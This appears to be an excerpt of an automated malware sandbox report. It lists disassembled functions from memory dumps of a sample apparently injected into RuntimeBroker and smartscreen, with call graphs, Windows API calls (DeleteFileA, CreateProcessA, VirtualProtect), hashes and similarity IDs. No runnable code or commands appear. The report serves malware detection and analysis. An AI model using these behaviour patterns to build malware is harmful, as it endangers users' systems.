                                                                                                                                                                          control_flow_graph 716 1c29a6-1c2a1a call 1c3653 lstrcat call 1c25e8 call 1c29dd call 1c3653 lstrcat call 1c2501 call 1c2a14 call 1c3653 lstrcat 733 1c2a20-1c2a43 call 1c2b4d call 1c34f7 716->733 737 1c2a48-1c2a4f 733->737 737->733 738 1c2a51-1c2a6d call 1c343f call 1c2683 737->738 743 1c2a6f 738->743 744 1c2a9a-1c2ab1 call 1c2683 738->744 743->744 745 1c2a71-1c2a86 call 1c26f9 743->745 750 1c2ade-1c2af5 call 1c2683 744->750 751 1c2ab3 744->751 745->744 753 1c2a88 745->753 758 1c2af8-1c2b11 call 1c2e97 750->758 759 1c2af7 750->759 751->750 754 1c2ab5-1c2aca call 1c26f9 751->754 753->744 756 1c2a8a-1c2a94 DeleteFileA 753->756 754->750 762 1c2acc 754->762 756->744 765 1c2b34-1c2b48 Sleep 758->765 766 1c2b13-1c2b1c call 1c3057 758->766 759->758 762->750 764 1c2ace-1c2ad8 DeleteFileA 762->764 764->750 765->737 766->765 769 1c2b1e-1c2b2e DeleteFileA 766->769 769->765
                                                                                                                                                                          APIs
                                                                                                                                                                          • lstrcat.KERNEL32(00000000,001C299D), ref: 001C29AC
                                                                                                                                                                            • Part of subcall function 001C29DD: lstrcat.KERNEL32(00000000,001C29D4), ref: 001C29E3
                                                                                                                                                                            • Part of subcall function 001C29DD: lstrcat.KERNEL32(00000000,001C2A0B), ref: 001C2A1A
                                                                                                                                                                            • Part of subcall function 001C29DD: DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 001C2A94
                                                                                                                                                                            • Part of subcall function 001C29DD: DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 001C2AD8
                                                                                                                                                                          • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000001,00000000,00000000,00A00000), ref: 001C2B2E
                                                                                                                                                                          • Sleep.KERNEL32(000A012C,00000000,00000000,00000000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000), ref: 001C2B42
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000C.00000002.1888751495.00000000001C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_12_2_1c0000_bin.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: DeleteFilelstrcat$Sleep
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 588723932-0
                                                                                                                                                                          • Opcode ID: cf8439a9f46fc1c5678143b13b51c65cbdf78dca36166c9e79c3ab7667b2c553
                                                                                                                                                                          • Instruction ID: c636e14730fe7c8789ea0b8b2e66408bc148dc9e268f550b67392472ade30f33
                                                                                                                                                                          • Opcode Fuzzy Hash: cf8439a9f46fc1c5678143b13b51c65cbdf78dca36166c9e79c3ab7667b2c553
                                                                                                                                                                          • Instruction Fuzzy Hash: 9441F1715002289FDB22BB618D49FAB77BCEF60705F0444AAEA45E7055DB74DA80CEA1
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 02242A01 Relevance: 9.1, APIs: 6, Instructions: 112stringCOMMON
                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 871 2242a01-2242a3e call 2243677 lstrcat call 2242525 call 2242a38 call 2243677 lstrcat 881 2242a44-2242a67 call 2242b71 call 224351b 871->881 885 2242a6c-2242a73 881->885 885->881 886 2242a75-2242a91 call 2243463 call 22426a7 885->886 891 2242a93 886->891 892 2242abe-2242ad5 call 22426a7 886->892 891->892 893 2242a95-2242aaa call 224271d 891->893 897 2242ad7 892->897 898 2242b02-2242b19 call 22426a7 892->898 893->892 902 2242aac 893->902 897->898 900 2242ad9-2242aee call 224271d 897->900 907 2242b1c-2242b35 call 2242ebb 898->907 908 2242b1b 898->908 900->898 909 2242af0 900->909 902->892 905 2242aae-2242ab8 DeleteFileA 902->905 905->892 913 2242b37-2242b40 call 224307b 907->913 914 2242b58-2242b6c Sleep 907->914 908->907 909->898 911 2242af2-2242afc DeleteFileA 909->911 911->898 913->914 917 2242b42-2242b52 DeleteFileA 913->917 914->885 917->914
                                                                                                                                                                          APIs
                                                                                                                                                                          • lstrcat.KERNEL32(00000000,022429F8), ref: 02242A07
                                                                                                                                                                            • Part of subcall function 02242A38: lstrcat.KERNEL32(00000000,02242A2F), ref: 02242A3E
                                                                                                                                                                            • Part of subcall function 02242A38: DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 02242AB8
                                                                                                                                                                            • Part of subcall function 02242A38: DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 02242AFC
                                                                                                                                                                            • Part of subcall function 02242A38: DeleteFileA.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000001,00000000,00000000,00A00000), ref: 02242B52
                                                                                                                                                                            • Part of subcall function 02242A38: Sleep.KERNEL32(000A012C,00000000,00000000,00000000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000), ref: 02242B66
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000C.00000002.1890143342.0000000002240000.00000040.00001000.00020000.00000000.sdmp, Offset: 02240000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_12_2_2240000_bin.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: DeleteFile$lstrcat$Sleep
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 4261675396-0
                                                                                                                                                                          • Opcode ID: 79bd1a0af3af01ca763be06bdfa33372cb59c75e302318f70dd6acde58cfabce
                                                                                                                                                                          • Instruction ID: 5834a97c4d0ba8d0ad55c70fbb87292d868b41f2cccd0a86f4b2a0fb47d03001
                                                                                                                                                                          • Opcode Fuzzy Hash: 79bd1a0af3af01ca763be06bdfa33372cb59c75e302318f70dd6acde58cfabce
                                                                                                                                                                          • Instruction Fuzzy Hash: FD411571410724DEDB2AAFB18D48FAB76BDEF40709F404596BE85EA058DE349680CEA1
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 001C29DD Relevance: 9.1, APIs: 6, Instructions: 112stringCOMMON
                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 824 1c29dd-1c2a1a call 1c3653 lstrcat call 1c2501 call 1c2a14 call 1c3653 lstrcat 834 1c2a20-1c2a43 call 1c2b4d call 1c34f7 824->834 838 1c2a48-1c2a4f 834->838 838->834 839 1c2a51-1c2a6d call 1c343f call 1c2683 838->839 844 1c2a6f 839->844 845 1c2a9a-1c2ab1 call 1c2683 839->845 844->845 846 1c2a71-1c2a86 call 1c26f9 844->846 851 1c2ade-1c2af5 call 1c2683 845->851 852 1c2ab3 845->852 846->845 854 1c2a88 846->854 859 1c2af8-1c2b11 call 1c2e97 851->859 860 1c2af7 851->860 852->851 855 1c2ab5-1c2aca call 1c26f9 852->855 854->845 857 1c2a8a-1c2a94 DeleteFileA 854->857 855->851 863 1c2acc 855->863 857->845 866 1c2b34-1c2b48 Sleep 859->866 867 1c2b13-1c2b1c call 1c3057 859->867 860->859 863->851 865 1c2ace-1c2ad8 DeleteFileA 863->865 865->851 866->838 867->866 870 1c2b1e-1c2b2e DeleteFileA 867->870 870->866
                                                                                                                                                                          APIs
                                                                                                                                                                          • lstrcat.KERNEL32(00000000,001C29D4), ref: 001C29E3
                                                                                                                                                                            • Part of subcall function 001C2A14: lstrcat.KERNEL32(00000000,001C2A0B), ref: 001C2A1A
                                                                                                                                                                            • Part of subcall function 001C2A14: DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 001C2A94
                                                                                                                                                                            • Part of subcall function 001C2A14: DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 001C2AD8
                                                                                                                                                                            • Part of subcall function 001C2A14: DeleteFileA.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000001,00000000,00000000,00A00000), ref: 001C2B2E
                                                                                                                                                                            • Part of subcall function 001C2A14: Sleep.KERNEL32(000A012C,00000000,00000000,00000000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000), ref: 001C2B42
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000C.00000002.1888751495.00000000001C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_12_2_1c0000_bin.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: DeleteFile$lstrcat$Sleep
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 4261675396-0
                                                                                                                                                                          • Opcode ID: 79bd1a0af3af01ca763be06bdfa33372cb59c75e302318f70dd6acde58cfabce
                                                                                                                                                                          • Instruction ID: d6b160bcfa924dc1f1ce780805323c99afb8a852cbc58ab7edcbb3794eecdb08
                                                                                                                                                                          • Opcode Fuzzy Hash: 79bd1a0af3af01ca763be06bdfa33372cb59c75e302318f70dd6acde58cfabce
                                                                                                                                                                          • Instruction Fuzzy Hash: 8D4130B15002289FDB22BB618D49FAF76BCEF60705F0444AEEA45E7041DB74DA80CEA1
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 02242A38 Relevance: 7.6, APIs: 5, Instructions: 94filesleepstringCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • lstrcat.KERNEL32(00000000,02242A2F), ref: 02242A3E
                                                                                                                                                                            • Part of subcall function 02242B71: Sleep.KERNEL32(00000001,?,452F5000,00000020), ref: 02242C68
                                                                                                                                                                          • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 02242AB8
                                                                                                                                                                          • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 02242AFC
                                                                                                                                                                          • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000001,00000000,00000000,00A00000), ref: 02242B52
                                                                                                                                                                          • Sleep.KERNEL32(000A012C,00000000,00000000,00000000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000), ref: 02242B66
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000C.00000002.1890143342.0000000002240000.00000040.00001000.00020000.00000000.sdmp, Offset: 02240000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_12_2_2240000_bin.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: DeleteFile$Sleep$lstrcat
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 531250245-0
                                                                                                                                                                          • Opcode ID: 1956c4aaa65c64439c9b8d6f86777e9786a239e5efddbd3eff6fe4d2a2c1f180
                                                                                                                                                                          • Instruction ID: 0b46adcf9dd6eef3742890153e45ac67fbb56de4fc34788b87d218e44658c78d
                                                                                                                                                                          • Opcode Fuzzy Hash: 1956c4aaa65c64439c9b8d6f86777e9786a239e5efddbd3eff6fe4d2a2c1f180
                                                                                                                                                                          • Instruction Fuzzy Hash: A5311271510668DEDB2A6FB18D48FAB76BCEF40709F4046A5BE85EA058DF349580CEA0
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 001C2A14 Relevance: 7.6, APIs: 5, Instructions: 94filesleepstringCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • lstrcat.KERNEL32(00000000,001C2A0B), ref: 001C2A1A
                                                                                                                                                                            • Part of subcall function 001C2B4D: Sleep.KERNEL32(00000001,?,452F5000,00000020), ref: 001C2C44
                                                                                                                                                                          • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 001C2A94
                                                                                                                                                                          • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 001C2AD8
                                                                                                                                                                          • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000001,00000000,00000000,00A00000), ref: 001C2B2E
                                                                                                                                                                          • Sleep.KERNEL32(000A012C,00000000,00000000,00000000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000), ref: 001C2B42
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000C.00000002.1888751495.00000000001C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_12_2_1c0000_bin.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: DeleteFile$Sleep$lstrcat
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 531250245-0
                                                                                                                                                                          • Opcode ID: 1956c4aaa65c64439c9b8d6f86777e9786a239e5efddbd3eff6fe4d2a2c1f180
                                                                                                                                                                          • Instruction ID: 49968fa7a4b5d5aca4da9ad6627b8677a1410d3c3c0f57381d6fd9009df4eb89
                                                                                                                                                                          • Opcode Fuzzy Hash: 1956c4aaa65c64439c9b8d6f86777e9786a239e5efddbd3eff6fe4d2a2c1f180
                                                                                                                                                                          • Instruction Fuzzy Hash: B9313EB15002699FDB227B618C48FAF76FCEF60705F0044AEEA45E7045DB34DA80CEA0
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 022431EA Relevance: 7.6, APIs: 5, Instructions: 62processstringCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • lstrcat.KERNEL32(00000000,00000000), ref: 0224320E
                                                                                                                                                                          • GetStartupInfoA.KERNEL32(00000000), ref: 0224324C
                                                                                                                                                                          • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,022431D9,00000011,?,00000000,00000000), ref: 02243279
                                                                                                                                                                          • CloseHandle.KERNEL32(?,?,022431D9,00000011,?,00000000,00000000,00000000,02243092,00000004,00000000), ref: 02243285
                                                                                                                                                                          • CloseHandle.KERNEL32(?,?,022431D9,00000011,?,00000000,00000000,00000000,02243092,00000004,00000000), ref: 02243291
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000C.00000002.1890143342.0000000002240000.00000040.00001000.00020000.00000000.sdmp, Offset: 02240000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_12_2_2240000_bin.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CloseHandle$CreateInfoProcessStartuplstrcat
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3387338972-0
                                                                                                                                                                          • Opcode ID: f32ac5f5813da37de2e85505615cf9f5e1a16b83960bb8701c11823c1c915505
                                                                                                                                                                          • Instruction ID: dba31129b1e20a9a0824a8bad7ff0fe67c21494d06b0bfffd090dd9dd11d6304
                                                                                                                                                                          • Opcode Fuzzy Hash: f32ac5f5813da37de2e85505615cf9f5e1a16b83960bb8701c11823c1c915505
                                                                                                                                                                          • Instruction Fuzzy Hash: 231112724106189FDF16ABA0CC48AAEB7BDEF40305F414595A985EA009DE705A80CEA5
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 001C31C6 Relevance: 7.6, APIs: 5, Instructions: 62processstringCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • lstrcat.KERNEL32(00000000,00000000), ref: 001C31EA
                                                                                                                                                                          • GetStartupInfoA.KERNEL32(00000000), ref: 001C3228
                                                                                                                                                                          • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,001C31B5,00000011,?,00000000,00000000), ref: 001C3255
                                                                                                                                                                          • CloseHandle.KERNEL32(?,?,001C31B5,00000011,?,00000000,00000000,00000000,001C306E,00000004,00000000), ref: 001C3261
                                                                                                                                                                          • CloseHandle.KERNEL32(?,?,001C31B5,00000011,?,00000000,00000000,00000000,001C306E,00000004,00000000), ref: 001C326D
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000C.00000002.1888751495.00000000001C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_12_2_1c0000_bin.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CloseHandle$CreateInfoProcessStartuplstrcat
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3387338972-0
                                                                                                                                                                          • Opcode ID: f32ac5f5813da37de2e85505615cf9f5e1a16b83960bb8701c11823c1c915505
                                                                                                                                                                          • Instruction ID: 1a8fcc1b29af6dc6d508c4043910ddb7290efc2c1b1de9f1c1491fbd14d99cd8
                                                                                                                                                                          • Opcode Fuzzy Hash: f32ac5f5813da37de2e85505615cf9f5e1a16b83960bb8701c11823c1c915505
                                                                                                                                                                          • Instruction Fuzzy Hash: 871121B2504958AFDF12AF60CC45FAF77BCEF60305F0145A9E986EA005DB349A90CEA5
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 001C0B65 Relevance: 6.1, APIs: 4, Instructions: 64threadCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • FindWindowA.USER32(001C0B57,0000000E), ref: 001C0B6A
                                                                                                                                                                          • GetWindowThreadProcessId.USER32(00000000,E9000437), ref: 001C0B77
                                                                                                                                                                          • OpenProcess.KERNEL32(001F0FFF,00000000), ref: 001C0B84
                                                                                                                                                                          • ExitProcess.KERNEL32(00000000,00000000,000008B3), ref: 001C0BA6
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000C.00000002.1888751495.00000000001C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_12_2_1c0000_bin.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Process$Window$ExitFindOpenThread
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 273847653-0
                                                                                                                                                                          • Opcode ID: 34cd6c9929bffda1e26e0ee6370170bb4b231b10a00d7b4531b927594a56342a
                                                                                                                                                                          • Instruction ID: a9338b71442d5d3ebf48e46985c07ff31f3dafee2d3b1c7779650113a65b08a8
                                                                                                                                                                          • Opcode Fuzzy Hash: 34cd6c9929bffda1e26e0ee6370170bb4b231b10a00d7b4531b927594a56342a
                                                                                                                                                                          • Instruction Fuzzy Hash: CE11EF25204301AEEF136BB08D56F663F28AF36B00F0A419DF8449E0A3DB20C9429A38
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 02243F31 Relevance: 6.0, APIs: 4, Instructions: 26sleepCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetModuleHandleA.KERNEL32(00000000,00000000,?,02243F27,0000000A,E8FFFF1B,00000000,0000000A), ref: 02243F51
                                                                                                                                                                          • Sleep.KERNEL32(000003E8,00000000,?,02243F27,0000000A,E8FFFF1B,00000000,0000000A), ref: 02243F6F
                                                                                                                                                                          • Sleep.KERNEL32(000007D0), ref: 02243F7F
                                                                                                                                                                          • Sleep.KERNEL32(00000BB8), ref: 02243F8F
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000C.00000002.1890143342.0000000002240000.00000040.00001000.00020000.00000000.sdmp, Offset: 02240000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_12_2_2240000_bin.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Sleep$HandleModule
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3646095425-0
                                                                                                                                                                          • Opcode ID: e04edd3b56a3ae2e38138ccc1fa4ca0e34bf568aa8a0740690bb103294f382c8
                                                                                                                                                                          • Instruction ID: 54428cb05abc3182e8d436c58939e8dd3b2f2a4c1ed812aba08b0d4b2c60d910
                                                                                                                                                                          • Opcode Fuzzy Hash: e04edd3b56a3ae2e38138ccc1fa4ca0e34bf568aa8a0740690bb103294f382c8
                                                                                                                                                                          • Instruction Fuzzy Hash: E3F01CB05683509AFB48BFF08C4CA4E3AB9AF00704F1501D0AA89AD09EDF7490508E75
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 001C3EC3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 39libraryCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • LoadLibraryA.KERNEL32(001C3EBD,00000006,E8FFFE1B,00000000), ref: 001C3EC8
                                                                                                                                                                          • GetModuleHandleA.KERNEL32(00000000,00000000,?,001C3F03,0000000A,E8FFFF1B,00000000,0000000A), ref: 001C3F2D
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000C.00000002.1888751495.00000000001C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_12_2_1c0000_bin.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: HandleLibraryLoadModule
                                                                                                                                                                          • String ID: j
                                                                                                                                                                          • API String ID: 4133054770-2747090070
                                                                                                                                                                          • Opcode ID: 99f70bd6b06b53a7fd6d28a083be50230d299d6762310f15b5c168a6665c2821
                                                                                                                                                                          • Instruction ID: c4430a2c0c24a2b0bdc06aa21888522cca28319f24652424d60ea3f5ea681fdb
                                                                                                                                                                          • Opcode Fuzzy Hash: 99f70bd6b06b53a7fd6d28a083be50230d299d6762310f15b5c168a6665c2821
                                                                                                                                                                          • Instruction Fuzzy Hash: BEF0C871948250AEEB127A708855FAE32BCAF70701F00C45DBA95DA041DF30C740DAB7
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Executed Functions

                                                                                                                                                                          Function 00AB0811 Relevance: 3.1, APIs: 2, Instructions: 111threadCOMMON
                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000011.00000002.2966196276.0000000000AB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00AB0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_17_2_ab0000_RuntimeBroker.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ExitSleepThreadUser
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3375650085-0
                                                                                                                                                                          • Opcode ID: 992149f37510bf435a63d6c026afa7e5196d855f937f02806c44f21d9357a639
                                                                                                                                                                          • Instruction ID: a746e57cf6378d43ca32d6e26f47fe512de4d0868098c976c8f9b264cff3b5ab
                                                                                                                                                                          • Opcode Fuzzy Hash: 992149f37510bf435a63d6c026afa7e5196d855f937f02806c44f21d9357a639
                                                                                                                                                                          • Instruction Fuzzy Hash: 0B31C8724102046FEB017FB09E46EFB3BACEF11310F440165BD85DA0A7EA744A658AB5
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Executed Functions

                                                                                                                                                                          Function 00291D5A Relevance: 4.6, APIs: 3, Instructions: 123memoryCOMMON
                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000012.00000002.2966205719.0000000000290000.00000040.00000001.00020000.00000000.sdmp, Offset: 00290000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_18_2_290000_smartscreen.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Virtual$Protect$Alloc
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2541858876-0
                                                                                                                                                                          • Opcode ID: d4c8ab3f009f1a42ba1f4b1f1ca1d2215188908ad26b68096351dda695124fe0
                                                                                                                                                                          • Instruction ID: 5cfeb1bcbae8c558e98dcdee69f702b75d149b9acfc2b5526b48693fa100539d
                                                                                                                                                                          • Opcode Fuzzy Hash: d4c8ab3f009f1a42ba1f4b1f1ca1d2215188908ad26b68096351dda695124fe0
                                                                                                                                                                          • Instruction Fuzzy Hash: F421F730B34C1E0BEF58A67D9859764F6D2E79C320F980295E90DD36E8ED58CC9187C6
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 00290811 Relevance: 3.1, APIs: 2, Instructions: 111threadCOMMON
                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000012.00000002.2966205719.0000000000290000.00000040.00000001.00020000.00000000.sdmp, Offset: 00290000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_18_2_290000_smartscreen.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ExitSleepThreadUser
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3375650085-0
                                                                                                                                                                          • Opcode ID: 992149f37510bf435a63d6c026afa7e5196d855f937f02806c44f21d9357a639
                                                                                                                                                                          • Instruction ID: c058b29fad30e67ee3f8ad258c7953d0322cd43e49dbed41448cb6062d2459d6
                                                                                                                                                                          • Opcode Fuzzy Hash: 992149f37510bf435a63d6c026afa7e5196d855f937f02806c44f21d9357a639
                                                                                                                                                                          • Instruction Fuzzy Hash: 9A31E872520209BFEF017F709D86ABA77ACFF11300F400165BD85DA0A6DA744D74CAB5
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Executed Functions

                                                                                                                                                                          Function 02410005 Relevance: 2.6, APIs: 1, Instructions: 1116COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 0241098B: OpenMutexA.KERNEL32(001F0001,00000000,00000000), ref: 024109A5
                                                                                                                                                                            • Part of subcall function 0241098B: GetStartupInfoA.KERNEL32(00000000), ref: 024109BD
                                                                                                                                                                          • ExitProcess.KERNEL32(00000000), ref: 0241001D
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000013.00000002.1972126651.0000000002410000.00000040.00001000.00020000.00000000.sdmp, Offset: 02410000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_19_2_2410000_bin.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ExitInfoMutexOpenProcessStartup
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 213680645-0
                                                                                                                                                                          • Opcode ID: 8ded0c1563596ef065c873257d9f166c149bbeaf12971adc1d4101d8be03d7fe
                                                                                                                                                                          • Instruction ID: 50d6ee2316b118c1bf614193e8e38a8508b19c0441586af3adfa51ce95c114a0
                                                                                                                                                                          • Opcode Fuzzy Hash: 8ded0c1563596ef065c873257d9f166c149bbeaf12971adc1d4101d8be03d7fe
                                                                                                                                                                          • Instruction Fuzzy Hash: 3C72127144E3C44FD7279B208A65A667F79BF03208B0D30CBDC81DE1B3D6689989C76A
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 00750000 Relevance: 21.4, APIs: 3, Strings: 9, Instructions: 395memoryCOMMON
                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000013.00000002.1971670206.0000000000750000.00000040.00001000.00020000.00000000.sdmp, Offset: 00750000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_19_2_750000_bin.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ProtectVirtual
                                                                                                                                                                          • String ID: $1;$@$C[$R$d:$wJ$y7$v
                                                                                                                                                                          • API String ID: 544645111-3459585926
